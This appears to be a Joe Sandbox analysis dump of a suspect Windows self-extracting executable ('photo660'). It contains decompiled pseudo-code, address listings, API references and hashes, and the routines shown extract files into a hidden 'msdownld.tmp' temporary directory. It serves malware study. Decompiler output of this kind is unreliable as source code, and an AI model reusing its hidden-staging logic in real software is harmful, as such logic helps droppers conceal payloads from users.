										if(_v268 <= 0x5a) {
											do {
												_t109 = GetDriveTypeA( &_v268);
												__eflags = _t109 - 6;
												if(_t109 == 6) {
													L22:
													_t48 = GetFileAttributesA( &_v268);
													__eflags = _t48 - 0xffffffff;
													if(_t48 != 0xffffffff) {
														goto L30;
													} else {
														goto L23;
													}
												} else {
													__eflags = _t109 - 3;
													if(_t109 != 3) {
														L23:
														__eflags = _t109 - 2;
														if(_t109 != 2) {
															L28:
															_t66 = _v268;
															goto L29;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) {
																L29:
																_t60 = _t66 + 1;
																_v268 = _t60;
																goto L42;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L29;
																} else {
																	_t68 = E00A96952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E00A9597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E00A92630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E00A9658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0xa991e4;
																					E00A91781(0xa991e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E00A95467(0xa991e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E00A92630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E00A9597D( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L28;
																					} else {
																						goto L33;
																					}
																				}
																			}
																		} else {
																			goto L28;
																		}
																	}
																}
															}
														}
													} else {
														goto L22;
													}
												}
												goto L47;
												L42:
												__eflags = _t60 - 0x5a;
											} while (_t60 <= 0x5a);
										}
										goto L43;
									} else {
										_t101 = 1;
										_t69 = E00A95467(0xa991e4, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L45;
										} else {
											_t82 = 0xa991e4;
											_t70 = E00A92630(0, 0xa991e4, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L19;
											} else {
												_t101 = 1;
												_t82 = 0xa991e4;
												_t71 = E00A95467(0xa991e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
														_t82 =  &_v268;
														_t44 = E00A9597D(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _t35 - 0x5c;
							if(_t35 != 0x5c) {
								L10:
								_t72 = 1;
							} else {
								__eflags =  *0xa98b3f - _t35; // 0x0
								_t72 = 0;
								if(__eflags != 0) {
									goto L10;
								}
							}
							_t101 = 0;
							_t73 = E00A95467(0xa98b3e, 0, _t72);
							__eflags = _t73;
							if(_t73 != 0) {
								L45:
								_t38 = 1;
							} else {
								_t101 = 0x4be;
								E00A944B9(0, 0x4be, 0, 0, 0x10, 0);
								goto L2;
							}
						}
					} else {
						_t101 = 0x4b1;
						E00A944B9(0, 0x4b1, 0, 0, 0x10, 0);
						LocalFree(_t109);
						 *0xa99124 = 0x80070714;
						goto L2;
					}
				} else {
					_t101 = 0x4b5;
					E00A944B9(0, 0x4b5, 0, 0, 0x10, 0);
					 *0xa99124 = E00A96285();
					L2:
					_t38 = 0;
				}
				L47:
				return E00A96CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
			}





































                                                                                                                                                                                                        0x00a955ab
                                                                                                                                                                                                        0x00a955b2
                                                                                                                                                                                                        0x00a955c9
                                                                                                                                                                                                        0x00a955d5
                                                                                                                                                                                                        0x00a955d9
                                                                                                                                                                                                        0x00a95600
                                                                                                                                                                                                        0x00a95605
                                                                                                                                                                                                        0x00a9560a
                                                                                                                                                                                                        0x00a9560c
                                                                                                                                                                                                        0x00a95638
                                                                                                                                                                                                        0x00a95641
                                                                                                                                                                                                        0x00a95643
                                                                                                                                                                                                        0x00a95645
                                                                                                                                                                                                        0x00a95645
                                                                                                                                                                                                        0x00a9564c
                                                                                                                                                                                                        0x00a95652
                                                                                                                                                                                                        0x00a95657
                                                                                                                                                                                                        0x00a95659
                                                                                                                                                                                                        0x00a95696
                                                                                                                                                                                                        0x00a9569c
                                                                                                                                                                                                        0x00a9589f
                                                                                                                                                                                                        0x00a958a7
                                                                                                                                                                                                        0x00a958ac
                                                                                                                                                                                                        0x00a958b3
                                                                                                                                                                                                        0x00a958b5
                                                                                                                                                                                                        0x00a956a2
                                                                                                                                                                                                        0x00a956a2
                                                                                                                                                                                                        0x00a956a8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a956ae
                                                                                                                                                                                                        0x00a956ae
                                                                                                                                                                                                        0x00a956b9
                                                                                                                                                                                                        0x00a956bf
                                                                                                                                                                                                        0x00a956c1
                                                                                                                                                                                                        0x00a956f3
                                                                                                                                                                                                        0x00a956f3
                                                                                                                                                                                                        0x00a95705
                                                                                                                                                                                                        0x00a9570a
                                                                                                                                                                                                        0x00a95711
                                                                                                                                                                                                        0x00a95717
                                                                                                                                                                                                        0x00a95724
                                                                                                                                                                                                        0x00a95726
                                                                                                                                                                                                        0x00a95729
                                                                                                                                                                                                        0x00a95730
                                                                                                                                                                                                        0x00a95737
                                                                                                                                                                                                        0x00a9573d
                                                                                                                                                                                                        0x00a95740
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9572b
                                                                                                                                                                                                        0x00a9572b
                                                                                                                                                                                                        0x00a9572e
                                                                                                                                                                                                        0x00a95742
                                                                                                                                                                                                        0x00a95742
                                                                                                                                                                                                        0x00a95745
                                                                                                                                                                                                        0x00a9576b
                                                                                                                                                                                                        0x00a9576b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95747
                                                                                                                                                                                                        0x00a95747
                                                                                                                                                                                                        0x00a9574d
                                                                                                                                                                                                        0x00a9574f
                                                                                                                                                                                                        0x00a95771
                                                                                                                                                                                                        0x00a95771
                                                                                                                                                                                                        0x00a95773
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95751
                                                                                                                                                                                                        0x00a95751
                                                                                                                                                                                                        0x00a95753
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95755
                                                                                                                                                                                                        0x00a9575b
                                                                                                                                                                                                        0x00a95760
                                                                                                                                                                                                        0x00a95762
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95764
                                                                                                                                                                                                        0x00a95764
                                                                                                                                                                                                        0x00a95769
                                                                                                                                                                                                        0x00a9577e
                                                                                                                                                                                                        0x00a9577e
                                                                                                                                                                                                        0x00a95781
                                                                                                                                                                                                        0x00a95788
                                                                                                                                                                                                        0x00a9578d
                                                                                                                                                                                                        0x00a9578f
                                                                                                                                                                                                        0x00a957b2
                                                                                                                                                                                                        0x00a957b8
                                                                                                                                                                                                        0x00a957bd
                                                                                                                                                                                                        0x00a957bf
                                                                                                                                                                                                        0x00a957cd
                                                                                                                                                                                                        0x00a957cd
                                                                                                                                                                                                        0x00a957dd
                                                                                                                                                                                                        0x00a957e3
                                                                                                                                                                                                        0x00a957ef
                                                                                                                                                                                                        0x00a957f5
                                                                                                                                                                                                        0x00a957f8
                                                                                                                                                                                                        0x00a9580a
                                                                                                                                                                                                        0x00a9580a
                                                                                                                                                                                                        0x00a957fa
                                                                                                                                                                                                        0x00a95802
                                                                                                                                                                                                        0x00a95802
                                                                                                                                                                                                        0x00a9580d
                                                                                                                                                                                                        0x00a9580f
                                                                                                                                                                                                        0x00a95830
                                                                                                                                                                                                        0x00a95836
                                                                                                                                                                                                        0x00a9583d
                                                                                                                                                                                                        0x00a9584b
                                                                                                                                                                                                        0x00a95851
                                                                                                                                                                                                        0x00a95855
                                                                                                                                                                                                        0x00a9585a
                                                                                                                                                                                                        0x00a9585c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9585e
                                                                                                                                                                                                        0x00a9585e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9585e
                                                                                                                                                                                                        0x00a95811
                                                                                                                                                                                                        0x00a95817
                                                                                                                                                                                                        0x00a95819
                                                                                                                                                                                                        0x00a9581f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9581f
                                                                                                                                                                                                        0x00a95791
                                                                                                                                                                                                        0x00a95797
                                                                                                                                                                                                        0x00a9579c
                                                                                                                                                                                                        0x00a9579e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a957a0
                                                                                                                                                                                                        0x00a957a9
                                                                                                                                                                                                        0x00a957ae
                                                                                                                                                                                                        0x00a957b0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a957b0
                                                                                                                                                                                                        0x00a9579e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95769
                                                                                                                                                                                                        0x00a95762
                                                                                                                                                                                                        0x00a95753
                                                                                                                                                                                                        0x00a9574f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9572e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95864
                                                                                                                                                                                                        0x00a95864
                                                                                                                                                                                                        0x00a95864
                                                                                                                                                                                                        0x00a95717
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a956c3
                                                                                                                                                                                                        0x00a956c5
                                                                                                                                                                                                        0x00a956c9
                                                                                                                                                                                                        0x00a956ce
                                                                                                                                                                                                        0x00a956d0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a956d6
                                                                                                                                                                                                        0x00a956d6
                                                                                                                                                                                                        0x00a956d8
                                                                                                                                                                                                        0x00a956dd
                                                                                                                                                                                                        0x00a956df
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a956e1
                                                                                                                                                                                                        0x00a956e2
                                                                                                                                                                                                        0x00a956e4
                                                                                                                                                                                                        0x00a956e6
                                                                                                                                                                                                        0x00a956eb
                                                                                                                                                                                                        0x00a956ed
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a956f3
                                                                                                                                                                                                        0x00a956f3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9586c
                                                                                                                                                                                                        0x00a95878
                                                                                                                                                                                                        0x00a9587e
                                                                                                                                                                                                        0x00a95882
                                                                                                                                                                                                        0x00a95883
                                                                                                                                                                                                        0x00a95889
                                                                                                                                                                                                        0x00a9588e
                                                                                                                                                                                                        0x00a9588e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95896
                                                                                                                                                                                                        0x00a956ed
                                                                                                                                                                                                        0x00a956df
                                                                                                                                                                                                        0x00a956d0
                                                                                                                                                                                                        0x00a956c1
                                                                                                                                                                                                        0x00a956a8
                                                                                                                                                                                                        0x00a9565b
                                                                                                                                                                                                        0x00a9565b
                                                                                                                                                                                                        0x00a9565d
                                                                                                                                                                                                        0x00a95669
                                                                                                                                                                                                        0x00a95669
                                                                                                                                                                                                        0x00a9565f
                                                                                                                                                                                                        0x00a9565f
                                                                                                                                                                                                        0x00a95665
                                                                                                                                                                                                        0x00a95667
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95667
                                                                                                                                                                                                        0x00a9566c
                                                                                                                                                                                                        0x00a95673
                                                                                                                                                                                                        0x00a95678
                                                                                                                                                                                                        0x00a9567a
                                                                                                                                                                                                        0x00a9589b
                                                                                                                                                                                                        0x00a9589b
                                                                                                                                                                                                        0x00a95680
                                                                                                                                                                                                        0x00a95685
                                                                                                                                                                                                        0x00a9568c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9568c
                                                                                                                                                                                                        0x00a9567a
                                                                                                                                                                                                        0x00a9560e
                                                                                                                                                                                                        0x00a95613
                                                                                                                                                                                                        0x00a9561a
                                                                                                                                                                                                        0x00a95620
                                                                                                                                                                                                        0x00a95626
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95626
                                                                                                                                                                                                        0x00a955db
                                                                                                                                                                                                        0x00a955e0
                                                                                                                                                                                                        0x00a955e7
                                                                                                                                                                                                        0x00a955f1
                                                                                                                                                                                                        0x00a955f6
                                                                                                                                                                                                        0x00a955f6
                                                                                                                                                                                                        0x00a955f6
                                                                                                                                                                                                        0x00a958b7
                                                                                                                                                                                                        0x00a958c7

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946A0
                                                                                                                                                                                                          • Part of subcall function 00A9468F: SizeofResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946A9
                                                                                                                                                                                                          • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946C3
                                                                                                                                                                                                          • Part of subcall function 00A9468F: LoadResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946CC
                                                                                                                                                                                                          • Part of subcall function 00A9468F: LockResource.KERNEL32(00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946D3
                                                                                                                                                                                                          • Part of subcall function 00A9468F: memcpy_s.MSVCRT ref: 00A946E5
                                                                                                                                                                                                          • Part of subcall function 00A9468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00A955CF
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00A95638
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00A9564C
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00A95620
                                                                                                                                                                                                          • Part of subcall function 00A944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A94518
                                                                                                                                                                                                          • Part of subcall function 00A944B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00A94554
                                                                                                                                                                                                          • Part of subcall function 00A96285: GetLastError.KERNEL32(00A95BBC), ref: 00A96285
                                                                                                                                                                                                        • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00A956B9
                                                                                                                                                                                                        • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00A9571E
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00A95737
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00A957CD
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00A957EF
                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00A95802
                                                                                                                                                                                                          • Part of subcall function 00A92630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00A92654
                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00A95830
                                                                                                                                                                                                          • Part of subcall function 00A96517: FindResourceA.KERNEL32(00A90000,000007D6,00000005), ref: 00A9652A
                                                                                                                                                                                                          • Part of subcall function 00A96517: LoadResource.KERNEL32(00A90000,00000000,?,?,00A92EE8,00000000,00A919E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A96538
                                                                                                                                                                                                          • Part of subcall function 00A96517: DialogBoxIndirectParamA.USER32(00A90000,00000000,00000547,00A919E0,00000000), ref: 00A96557
                                                                                                                                                                                                          • Part of subcall function 00A96517: FreeResource.KERNEL32(00000000,?,?,00A92EE8,00000000,00A919E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A96560
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00A95878
                                                                                                                                                                                                          • Part of subcall function 00A9597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00A959A8
                                                                                                                                                                                                          • Part of subcall function 00A9597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00A959AF
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                        • API String ID: 2436801531-3855382519
                                                                                                                                                                                                        • Opcode ID: bfc875d16ecaffe8fa18e406d763ac7356fbc2aa617213f405980fca87a38853
                                                                                                                                                                                                        • Instruction ID: bd5488a182c014e6690fe4457a7eb7d425e30b7b6f5d84a7a3cafbe513ae0522
                                                                                                                                                                                                        • Opcode Fuzzy Hash: bfc875d16ecaffe8fa18e406d763ac7356fbc2aa617213f405980fca87a38853
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 34812870F04A156BDF22ABB49D86BEE72ED9F64340F040466F586D2191EF748EC28B50
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A944B9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 160memorywindowCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 406 a944b9-a944f8 407 a94679-a9467b 406->407 408 a944fe-a94525 LoadStringA 406->408 411 a9467c-a9468c call a96ce0 407->411 409 a94562-a94568 408->409 410 a94527-a9452e call a9681f 408->410 414 a9456b-a94570 409->414 420 a9453f 410->420 421 a94530-a9453d call a967c9 410->421 414->414 415 a94572-a9457c 414->415 418 a945c9-a945cb 415->418 419 a9457e-a94580 415->419 424 a945cd-a945cf 418->424 425 a94607-a94617 LocalAlloc 418->425 422 a94583-a94588 419->422 426 a94544-a94554 MessageBoxA 420->426 421->420 421->426 422->422 429 a9458a-a9458c 422->429 431 a945d2-a945d7 424->431 427 a9455a-a9455d 425->427 428 a9461d-a94628 call a91680 425->428 426->427 427->411 435 a9462d-a9463d MessageBeep call a9681f 428->435 433 a9458f-a94594 429->433 431->431 434 a945d9-a945ed LocalAlloc 431->434 433->433 436 a94596-a945ad LocalAlloc 433->436 434->427 437 a945f3-a94605 call a9171e 434->437 444 a9463f-a9464c call a967c9 435->444 445 a9464e 435->445 436->427 439 a945af-a945c7 call a9171e 436->439 437->435 439->435 444->445 448 a94653-a94677 MessageBoxA LocalFree 444->448 445->448 448->411
                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00A944B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
				signed int _v8;
				char _v64;
				char _v576;
				void* _v580;
				struct HWND__* _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t37;
				signed int _t39;
				intOrPtr _t43;
				signed int _t44;
				signed int _t49;
				signed int _t52;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t58;
				intOrPtr _t59;
				int _t64;
				void* _t66;
				intOrPtr* _t67;
				signed int _t69;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				intOrPtr* _t84;
				void* _t85;
				signed int _t89;

				_t75 = __edx;
				_t34 =  *0xa98004; // 0x6298f871
				_v8 = _t34 ^ _t89;
				_v584 = __ecx;
				_t83 = "LoadString() Error.  Could not load string resource.";
				_t67 = _a4;
				_t69 = 0xd;
				_t37 = memcpy( &_v64, _t83, _t69 << 2);
				_t80 = _t83 + _t69 + _t69;
				_v580 = _t37;
				asm("movsb");
				if(( *0xa98a38 & 0x00000001) != 0) {
					_t39 = 1;
				} else {
					_v576 = 0;
					LoadStringA( *0xa99a3c, _t75,  &_v576, 0x200);
					if(_v576 != 0) {
						_t73 =  &_v576;
						_t16 = _t73 + 1; // 0x1
						_t75 = _t16;
						do {
							_t43 =  *_t73;
							_t73 = _t73 + 1;
						} while (_t43 != 0);
						_t84 = _v580;
						_t74 = _t73 - _t75;
						if(_t84 == 0) {
							if(_t67 == 0) {
								_t27 = _t74 + 1; // 0x2
								_t83 = _t27;
								_t44 = LocalAlloc(0x40, _t83);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									_t75 = _t83;
									_t74 = _t80;
									E00A91680(_t80, _t83,  &_v576);
									goto L23;
								}
							} else {
								_t76 = _t67;
								_t24 = _t76 + 1; // 0x1
								_t85 = _t24;
								do {
									_t55 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t55 != 0);
								_t25 = _t76 - _t85 + 0x64; // 0x65
								_t83 = _t25 + _t74;
								_t44 = LocalAlloc(0x40, _t25 + _t74);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									E00A9171E(_t80, _t83,  &_v576, _t67);
									goto L23;
								}
							}
						} else {
							_t77 = _t67;
							_t18 = _t77 + 1; // 0x1
							_t81 = _t18;
							do {
								_t58 =  *_t77;
								_t77 = _t77 + 1;
							} while (_t58 != 0);
							_t75 = _t77 - _t81;
							_t82 = _t84 + 1;
							do {
								_t59 =  *_t84;
								_t84 = _t84 + 1;
							} while (_t59 != 0);
							_t21 = _t74 + 0x64; // 0x65
							_t83 = _t21 + _t84 - _t82 + _t75;
							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
							_t80 = _t44;
							if(_t80 == 0) {
								goto L6;
							} else {
								_push(_v580);
								E00A9171E(_t80, _t83,  &_v576, _t67);
								L23:
								MessageBeep(_a12);
								if(E00A9681F(_t67) == 0) {
									L25:
									_t49 = 0x10000;
								} else {
									_t54 = E00A967C9(_t74, _t74);
									_t49 = 0x190000;
									if(_t54 == 0) {
										goto L25;
									}
								}
								_t52 = MessageBoxA(_v584, _t80, "photo660", _t49 | _a12 | _a16); // executed
								_t83 = _t52;
								LocalFree(_t80);
								_t39 = _t52;
							}
						}
					} else {
						if(E00A9681F(_t67) == 0) {
							L4:
							_t64 = 0x10010;
						} else {
							_t66 = E00A967C9(0, 0);
							_t64 = 0x190010;
							if(_t66 == 0) {
								goto L4;
							}
						}
						_t44 = MessageBoxA(_v584,  &_v64, "photo660", _t64);
						L6:
						_t39 = _t44 | 0xffffffff;
					}
				}
				return E00A96CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
			}



































                                                                                                                                                                                                        0x00a944b9
                                                                                                                                                                                                        0x00a944c4
                                                                                                                                                                                                        0x00a944cb
                                                                                                                                                                                                        0x00a944d8
                                                                                                                                                                                                        0x00a944e4
                                                                                                                                                                                                        0x00a944eb
                                                                                                                                                                                                        0x00a944ee
                                                                                                                                                                                                        0x00a944ef
                                                                                                                                                                                                        0x00a944ef
                                                                                                                                                                                                        0x00a944f1
                                                                                                                                                                                                        0x00a944f7
                                                                                                                                                                                                        0x00a944f8
                                                                                                                                                                                                        0x00a9467b
                                                                                                                                                                                                        0x00a944fe
                                                                                                                                                                                                        0x00a94509
                                                                                                                                                                                                        0x00a94518
                                                                                                                                                                                                        0x00a94525
                                                                                                                                                                                                        0x00a94562
                                                                                                                                                                                                        0x00a94568
                                                                                                                                                                                                        0x00a94568
                                                                                                                                                                                                        0x00a9456b
                                                                                                                                                                                                        0x00a9456b
                                                                                                                                                                                                        0x00a9456d
                                                                                                                                                                                                        0x00a9456e
                                                                                                                                                                                                        0x00a94572
                                                                                                                                                                                                        0x00a94578
                                                                                                                                                                                                        0x00a9457c
                                                                                                                                                                                                        0x00a945cb
                                                                                                                                                                                                        0x00a94607
                                                                                                                                                                                                        0x00a94607
                                                                                                                                                                                                        0x00a9460d
                                                                                                                                                                                                        0x00a94613
                                                                                                                                                                                                        0x00a94617
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9461d
                                                                                                                                                                                                        0x00a94623
                                                                                                                                                                                                        0x00a94626
                                                                                                                                                                                                        0x00a94628
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a94628
                                                                                                                                                                                                        0x00a945cd
                                                                                                                                                                                                        0x00a945cd
                                                                                                                                                                                                        0x00a945cf
                                                                                                                                                                                                        0x00a945cf
                                                                                                                                                                                                        0x00a945d2
                                                                                                                                                                                                        0x00a945d2
                                                                                                                                                                                                        0x00a945d4
                                                                                                                                                                                                        0x00a945d5
                                                                                                                                                                                                        0x00a945db
                                                                                                                                                                                                        0x00a945de
                                                                                                                                                                                                        0x00a945e3
                                                                                                                                                                                                        0x00a945e9
                                                                                                                                                                                                        0x00a945ed
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a945f3
                                                                                                                                                                                                        0x00a945fd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a94602
                                                                                                                                                                                                        0x00a945ed
                                                                                                                                                                                                        0x00a9457e
                                                                                                                                                                                                        0x00a9457e
                                                                                                                                                                                                        0x00a94580
                                                                                                                                                                                                        0x00a94580
                                                                                                                                                                                                        0x00a94583
                                                                                                                                                                                                        0x00a94583
                                                                                                                                                                                                        0x00a94585
                                                                                                                                                                                                        0x00a94586
                                                                                                                                                                                                        0x00a9458a
                                                                                                                                                                                                        0x00a9458c
                                                                                                                                                                                                        0x00a9458f
                                                                                                                                                                                                        0x00a9458f
                                                                                                                                                                                                        0x00a94591
                                                                                                                                                                                                        0x00a94592
                                                                                                                                                                                                        0x00a9459b
                                                                                                                                                                                                        0x00a9459e
                                                                                                                                                                                                        0x00a945a3
                                                                                                                                                                                                        0x00a945a9
                                                                                                                                                                                                        0x00a945ad
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a945af
                                                                                                                                                                                                        0x00a945af
                                                                                                                                                                                                        0x00a945bf
                                                                                                                                                                                                        0x00a9462d
                                                                                                                                                                                                        0x00a94630
                                                                                                                                                                                                        0x00a9463d
                                                                                                                                                                                                        0x00a9464e
                                                                                                                                                                                                        0x00a9464e
                                                                                                                                                                                                        0x00a9463f
                                                                                                                                                                                                        0x00a94640
                                                                                                                                                                                                        0x00a94647
                                                                                                                                                                                                        0x00a9464c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9464c
                                                                                                                                                                                                        0x00a94666
                                                                                                                                                                                                        0x00a9466d
                                                                                                                                                                                                        0x00a9466f
                                                                                                                                                                                                        0x00a94675
                                                                                                                                                                                                        0x00a94675
                                                                                                                                                                                                        0x00a945ad
                                                                                                                                                                                                        0x00a94527
                                                                                                                                                                                                        0x00a9452e
                                                                                                                                                                                                        0x00a9453f
                                                                                                                                                                                                        0x00a9453f
                                                                                                                                                                                                        0x00a94530
                                                                                                                                                                                                        0x00a94531
                                                                                                                                                                                                        0x00a94538
                                                                                                                                                                                                        0x00a9453d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9453d
                                                                                                                                                                                                        0x00a94554
                                                                                                                                                                                                        0x00a9455a
                                                                                                                                                                                                        0x00a9455a
                                                                                                                                                                                                        0x00a9455a
